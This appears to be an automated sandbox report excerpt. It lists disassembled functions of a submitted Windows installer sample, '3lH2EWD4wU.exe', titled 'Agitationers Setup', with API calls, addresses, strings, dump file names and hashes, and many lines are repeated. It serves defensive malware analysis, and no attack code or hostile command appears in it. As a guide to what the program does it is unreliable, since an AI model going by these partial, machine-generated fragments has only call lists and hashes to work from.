                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: : Completed$N$uA@
                                                  • API String ID: 3103080414-130251812
                                                  • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                                  • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                                                  • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                                                  • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,Agitationers Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Agitationers Setup$F
                                                  • API String ID: 941294808-1687728078
                                                  • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                  • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                                  • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                  • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                                                  • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                                                    • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                    • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                  • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                                                  • wsprintfA.USER32 ref: 00405C84
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                                                  • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                                    • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
                                                    • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                                  • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                                                  • Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                                  • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\3lH2EWD4wU.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                  • CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                  Strings
                                                  • *?|<>/":, xrefs: 00406252
                                                  • "C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 00406246
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-2589227440
                                                  • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                  • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                                                  • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                  • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                                                  • GetSysColor.USER32(00000000), ref: 00404101
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040410D
                                                  • SetBkMode.GDI32(?,?), ref: 00404119
                                                  • GetSysColor.USER32(?), ref: 0040412C
                                                  • SetBkColor.GDI32(?,?), ref: 0040413C
                                                  • DeleteObject.GDI32(?), ref: 00404156
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404160
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                  • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                                                  • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                  • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                                                  • GetMessagePos.USER32 ref: 004049B5
                                                  • ScreenToClient.USER32(?,?), ref: 004049CF
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                  • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                                                  • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                  • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D9E
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                  • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                                  • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                                                  • Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                                  • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                  • MulDiv.KERNEL32(000B447F,00000064,000B4483), ref: 00402CC2
                                                  • wsprintfA.USER32 ref: 00402CD2
                                                  • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402CCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                                  • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                                                  • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                                  • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                                  • GetLastError.KERNEL32 ref: 004055E4
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                                                  • GetLastError.KERNEL32 ref: 00405603
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 0040558D
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-1229045261
                                                  • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                  • Instruction ID: 602471e653a91b50aa3f697eebcabcd82e3e1e6dca1d35eba90d193cad737e86
                                                  • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                  • Instruction Fuzzy Hash: 2D011A71C00219EADF10DFA1C9047EFBBB8EF14355F10803AD545B6290DB799608CFA9
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                  • GlobalFree.KERNEL32(?), ref: 004027EB
                                                  • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                                  • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                                                  • Opcode Fuzzy Hash: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                                  • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                                                  APIs
                                                  • lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                  • wsprintfA.USER32 ref: 0040492E
                                                  • SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$Agitationers Setup: Completed
                                                  • API String ID: 3540041739-230625191
                                                  • Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                                  • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                                                  • Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                                  • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                                    • Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                    • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                    • Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
                                                    • Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                    • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID: Triu,fe$
                                                  • API String ID: 2987980305-1397165661
                                                  • Opcode ID: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
                                                  • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                                                  • Opcode Fuzzy Hash: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
                                                  • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
